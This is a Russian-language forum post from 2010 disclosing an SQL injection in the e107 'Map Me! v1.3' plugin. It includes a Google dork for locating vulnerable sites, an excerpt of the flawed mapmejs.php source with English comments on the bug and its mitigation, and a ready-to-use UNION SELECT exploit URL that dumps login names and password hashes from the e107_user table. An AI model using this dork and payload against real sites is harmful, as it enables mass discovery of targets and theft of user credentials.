
02.05.2010, 14:59
Map Me! v1.3 by rickey911
скачать
SQL inj
гугл- inurl:/e107_plugins/mapme
[path]/e107_plugins/mapme/mapmejs.php
PHP код:
// Excerpt of mapmejs.php: loads one user's map marker from the database and builds the
// marker popup markup as a JavaScript string (the output itself is not shown in this excerpt).
...require_once("../../class2.php");
// Get language file (assume that the English language file is always present)
$lan_file = e_PLUGIN."mapme/languages/".e_LANGUAGE.".php";
include_lan($lan_file);
// The response is declared as JavaScript, so any text emitted below ends up in a JS context.
header("Content-type: application/x-javascript");
global $pref, $user;
// Untrusted input: the user id is read directly from the query string with no validation and
// no cast. It is compared with numeric user_id columns and with USERID further down, so an
// integer cast / is_numeric check at this line would be the natural boundary control.
$uid = $_GET['u'];
// SQL injection: $uid is concatenated unquoted into the WHERE clause, so any non-numeric
// value sent in ?u= becomes part of the query. The @ suppresses mysql_query() errors, so a
// malformed or failing query produces no visible error here either. Mitigation: cast/validate
// $uid before it reaches this string (or use a parameterised query API).
$sql->mySQLresult = @mysql_query("SELECT ".MPREFIX."gmarkers.loc, ".MPREFIX."gmarkers.lat, ".MPREFIX."gmarkers.lng, ".MPREFIX."user.user_name, ".MPREFIX."user.user_image FROM `".MPREFIX."gmarkers`, ".MPREFIX."user where ".MPREFIX."gmarkers.user_id = ".$uid." and ".MPREFIX."gmarkers.user_id = ".MPREFIX."user.user_id");
// $sql is not declared in this excerpt; presumably set up by class2.php — confirm.
$rows=$sql->db_Rows();
if($rows){
$row = $sql->db_Fetch();
if($row['user_image']){
require_once(e_HANDLER."avatar_handler.php");
// user_name (and the avatar path) come from the database and are placed into HTML attributes
// without any escaping visible in this excerpt.
$uimage = "<img src='".avatar($row['user_image'])."' alt='".$row['user_name']."' style='text-align:middle' />";
}
else{
$uimage = "<img src='".e_PLUGIN."mapme/images/noavatar.gif' alt='".$row['user_name']."' style='text-align:middle' />";
}
// Popup markup is assembled inside a JS string literal (note the leading \"). user_name and
// loc are embedded raw — no htmlspecialchars() or JS-string escaping is applied — and the
// unvalidated $uid is reflected back into the user.php link.
$html = "\"<div style='width:250px;'><div style='float:left; text-align:left;'>".$uimage."</div><div style='float:left; text-align:left;'><a href='".e_BASE."user.php?id.".$uid."' title='".$row['user_name']."'><b>".$row['user_name']."</b></a><br>".MAPME_JS_001." ".$row['user_name']." ".MAPME_JS_002." ".$row['loc'].".";
// Loose (==) comparison of the raw query-string value against USERID; a strict comparison on
// an integer-cast $uid would be the expected form.
if($uid==USERID){
$html .="<br><br><span class='smalltext'><a href='".e_PLUGIN_ABS."mapme/mapconfig.php'>".MAPME_JS_003."</a></span>"; // bugfix by nlstart
}
...
Результат и никаких условий:
http://[host]/[path]/e107_plugins/mapme/mapmejs.php?u=-1+union+select+1,2,3,concat_ws(0x3a,user_loginname ,user_password),5+from+e107_user--+
PS: скоро буду эксплоиты на перл писать, когда вылечусь ):